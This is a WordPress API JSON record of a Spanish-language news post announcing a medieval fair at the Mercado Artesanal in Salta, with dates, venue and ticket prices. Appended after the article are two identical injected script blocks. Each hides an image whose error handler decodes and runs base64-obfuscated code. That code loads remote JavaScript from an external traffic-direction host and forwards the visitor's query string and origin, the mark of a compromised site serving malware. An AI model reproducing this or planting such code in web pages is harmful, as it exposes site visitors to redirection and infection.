{"id":4103,"date":"2024-06-12T10:38:31","date_gmt":"2024-06-12T13:38:31","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4103"},"modified":"2025-08-13T23:54:28","modified_gmt":"2025-08-14T02:54:28","slug":"llega-al-mercado-artesanal-una-nueva-edicion-del-mercado-medieval-y-afines-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4103","title":{"rendered":"Llega al Mercado Artesanal una nueva edici\u00f3n del Mercado Medieval y Afines Salta"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-8effd14dc26777bca1281e0a426d0143\" style=\"background-color:#7b0248\"><em>El 15 y 16 de junio, la fantas\u00eda vuelve a Salta con una amplia variedad de actividades que recrean el medioevo a trav\u00e9s de la historia y el arte. Un evento destinado a toda la familia.<\/em><\/h3>\n\n\n\n<p>Con el apoyo de la Secretar\u00eda de Cultura de la Provincia, La Magia Producciones presenta la novena edici\u00f3n del Mercado Medieval y Afines de Salta, un evento donde la familia podr\u00e1 disfrutar de mercaderes y artesanos, juegos, talleres, comidas de \u00e9poca, artistas invitados y espect\u00e1culos al aire libre.<\/p>\n\n\n\n<p>La cita ser\u00e1 el s\u00e1bado 15 y domingo 16 de junio, de 12 a 19 horas y de 15 a 22 horas respectivamente en las instalaciones del Mercado Artesanal de Salta, Av. San Mart\u00edn 2555. Un evento donde la magia, fantas\u00eda e historia se congregan.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12558-llega-al-mercado-artesanal-una-nueva-edicion-del-mercado-medieval-y-afines-salta.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/12558-llega-al-mercado-artesanal-una-nueva-edicion-del-mercado-medieval-y-afines-salta.jpg\" alt=\"Llega al Mercado Artesanal una nueva edici\u00f3n del Mercado Medieval y Afines Salta\"\/><\/a><\/figure>\n\n\n\n<p>La cita ser\u00e1 el s\u00e1bado 15 y domingo 16 de junio, de 12 a 19 horas y de 15 a 22 horas respectivamente en las instalaciones del Mercado Artesanal de Salta, Av. San Mart\u00edn 2555. Un evento donde la magia, fantas\u00eda e historia se congregan.<\/p>\n\n\n\n<p>Los interesados podr\u00e1n adquirir sus entradas en puerta. La boleter\u00eda se encontrar\u00e1 habilitada durante el evento.<\/p>\n\n\n\n<p><strong>Precios de ingreso por d\u00eda<\/strong>:<\/p>\n\n\n\n<p>Mayores de 12 a\u00f1os y adultos: $3500<br>A partir de los 6 a\u00f1os cumplidos y hasta los 11 a\u00f1os inclusive: $2500<br>Menores de 6 a\u00f1os: Gratis (acompa\u00f1ados de un mayor)<br>&nbsp;<\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n, ingresar a las redes sociales del evento @mercado.medieval<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El 15 y 16 de junio, la fantas\u00eda vuelve a Salta con una amplia variedad de actividades que recrean el medioevo a trav\u00e9s de la historia y el arte. Un evento destinado a toda la familia. Con el apoyo de la Secretar\u00eda de Cultura de la Provincia, La Magia Producciones presenta la novena edici\u00f3n del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4104,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4103","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4103"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4103"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4103\/revisions"}],"predecessor-version":[{"id":6765,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4103\/revisions\/6765"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4104"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4103"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4103"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4103"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}